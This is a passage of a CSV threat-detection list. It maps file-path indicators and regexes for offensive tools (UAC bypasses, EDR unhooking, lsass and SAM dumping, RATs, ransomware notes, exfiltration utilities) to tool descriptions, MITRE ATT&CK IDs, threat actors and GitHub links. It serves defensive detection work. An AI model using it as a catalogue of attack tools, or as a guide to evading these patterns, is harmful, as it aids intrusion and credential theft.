Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","19487" "*\UACBypassedService*",".{0,1000}\\UACBypassedService.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","19488" "*\UACBypassTest.txt*",".{0,1000}\\UACBypassTest\.txt.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary 
emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","19489" "*\UACBypassTest.txt*",".{0,1000}\\UACBypassTest\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19490" 
"*\UacInfo64.exe*",".{0,1000}\\UacInfo64\.exe.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","19491" "*\UACME-*.zip*",".{0,1000}\\UACME\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","19492" "*\UAC-TokenMagic.ps1*",".{0,1000}\\UAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","19493" "*\uberfile.py*",".{0,1000}\\uberfile\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","19494" "*\UefiShell.iso*",".{0,1000}\\UefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","19495" "*\UnconstrainedDelegationCheck .ahk*",".{0,1000}\\UnconstrainedDelegationCheck\s\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","19498" "*\UnconstrainedDelegationCheck.ahk*",".{0,1000}\\UnconstrainedDelegationCheck\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","19499" "*\unDefender.exe*",".{0,1000}\\unDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","19500" "*\UnhookingPatch\bin2mac.py*",".{0,1000}\\UnhookingPatch\\bin2mac\.py.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at 
runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","19501" "*\UnhookNTDLL.ahk*",".{0,1000}\\UnhookNTDLL\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","19502" "*\unlock your files.lnk*",".{0,1000}\\unlock\syour\sfiles\.lnk.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","19511" "*\UNLOCK_FILES.*.HTML*",".{0,1000}\\UNLOCK_FILES\..{0,1000}\.HTML.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19512" "*\UNLOCK_MY_FILES.txt*",".{0,1000}\\UNLOCK_MY_FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19513" 
"*\UnmanagedPowerShell.cpp*",".{0,1000}\\UnmanagedPowerShell\.cpp.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","19518" "*\UnmanagedPowerShell.exe*",".{0,1000}\\UnmanagedPowerShell\.exe.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","19519" "*\UnmanagedPowerShell.sln*",".{0,1000}\\UnmanagedPowerShell\.sln.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","19520" "*\UnmanagedPowerShell.vcxproj*",".{0,1000}\\UnmanagedPowerShell\.vcxproj.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","19521" "*\unpackerLoadEXE.exe*",".{0,1000}\\unpackerLoadEXE\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","19522" 
"*\UnquotedServicePath.cs*",".{0,1000}\\UnquotedServicePath\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","19523" "*\unquotedsvcpath.o*",".{0,1000}\\unquotedsvcpath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","19524" "*\unrootkit.dll*",".{0,1000}\\unrootkit\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","19525" "*\UnstoppableService.csproj*",".{0,1000}\\UnstoppableService\.csproj.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","19526" 
"*\UnstoppableService.sln*",".{0,1000}\\UnstoppableService\.sln.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","19527" "*\UnstoppableService-master*",".{0,1000}\\UnstoppableService\-master.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","19528" "*\Upload-OneDrive.csproj*",".{0,1000}\\Upload\-OneDrive\.csproj.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","19533" "*\Upload-OneDrive.exe*",".{0,1000}\\Upload\-OneDrive\.exe.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","19534" 
"*\Upload-OneDrive.sln*",".{0,1000}\\Upload\-OneDrive\.sln.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","19535" "*\URL_obfuscated.log*",".{0,1000}\\URL_obfuscated\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19536" "*\usbmon.txt*",".{0,1000}\\usbmon\.txt.{0,1000}","offensive_tool_keyword","usbmon","USB capture for Linux.","T1052 - T1059 - T1090 - T1105 - T1114 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.kernel.org/doc/Documentation/usb/usbmon.txt","1","0","#linux #windows","N/A","N/A","N/A","N/A","N/A","N/A","N/A","19537" "*\user_persistence_run.c*",".{0,1000}\\user_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","19538" 
"*\UserRightsUtil.exe*",".{0,1000}\\UserRightsUtil\.exe.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19539" "*\Users\*\c2.db*",".{0,1000}\\Users\\.{0,1000}\\c2\.db.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","19542" "*\Users\How To Restore Your Files.txt*",".{0,1000}\\Users\\How\sTo\sRestore\sYour\sFiles\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","ransomware note from knight ransomware","T1486","TA0040","N/A","N/A","Ransomware","https://tria.ge/230901-c2fbqacb36","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19543" "*\Users\Public\*.blf*",".{0,1000}\\Users\\Public\\.{0,1000}\.blf.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19544" "*\Users\Public\.2796*",".{0,1000}\\Users\\Public\\\.2796.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19548" 
"*\Users\Public\.p*",".{0,1000}\\Users\\Public\\\.p.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19549" "*\Users\Public\.p_0_*",".{0,1000}\\Users\\Public\\\.p_0_.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19550" "*\Users\Public\.p_1_*",".{0,1000}\\Users\\Public\\\.p_1_.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19551" "*\Users\Public\.p_128*",".{0,1000}\\Users\\Public\\\.p_128.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19552" "*\Users\Public\.p_2_*",".{0,1000}\\Users\\Public\\\.p_2_.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - 
TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19553" "*\Users\Public\.p_720*",".{0,1000}\\Users\\Public\\\.p_720.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19554" "*\Users\Public\128.blf*",".{0,1000}\\Users\\Public\\128\.blf.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19555" "*\Users\Public\720.blf*",".{0,1000}\\Users\\Public\\720\.blf.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","19556" "*\users\public\desktop\Fix-Your-Files.txt*",".{0,1000}\\users\\public\\desktop\\Fix\-Your\-Files\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","19557" 
"*\Users\Public\Documents\$($env:USERNAME)log.txt*",".{0,1000}\\Users\\Public\\Documents\\\$\(\$env\:USERNAME\)log\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19559" "*\Users\Public\Documents\comm.txt*",".{0,1000}\\Users\\Public\\Documents\\comm\.txt.{0,1000}","offensive_tool_keyword","Invoke-s4u2self","A tool that abuses s4u2self to gain access to remote hosts","T1550.002 - T1557.001","TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-s4u2self","1","0","N/A","N/A","9","1","5","2","2025-02-13T16:27:51Z","2023-09-14T13:31:05Z","19560" "*\Users\Public\DtcInstall.txt*",".{0,1000}\\Users\\Public\\DtcInstall\.txt.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","19561" "*\Users\Public\lsass.dmp*",".{0,1000}\\Users\\Public\\lsass\.dmp.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","19562" "*\Users\Public\nc.exe*",".{0,1000}\\Users\\Public\\nc\.exe.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","19563" "*\Users\Public\ngrok.exe*",".{0,1000}\\Users\\Public\\ngrok\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","19564" "*\Users\Public\quran.txt*",".{0,1000}\\Users\\Public\\quran\.txt.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","19565" "*\Users\Public\revshell.exe*",".{0,1000}\\Users\\Public\\revshell\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","19566" "*\users\public\sam.save*",".{0,1000}\\users\\public\\sam\.save.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","19567" "*\Users\Public\server.exe*",".{0,1000}\\Users\\Public\\server\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware 
(+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","19568" "*\users\public\system.save*",".{0,1000}\\users\\public\\system\.save.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","19569" "*\Users\Public\termsrv.dll*",".{0,1000}\\Users\\Public\\termsrv\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","19570" "*\Users\Public\termsrv.dll*",".{0,1000}\\Users\\Public\\termsrv\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","19571" "*\Users\Public\termsrv.patch.dll*",".{0,1000}\\Users\\Public\\termsrv\.patch\.dll.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - 
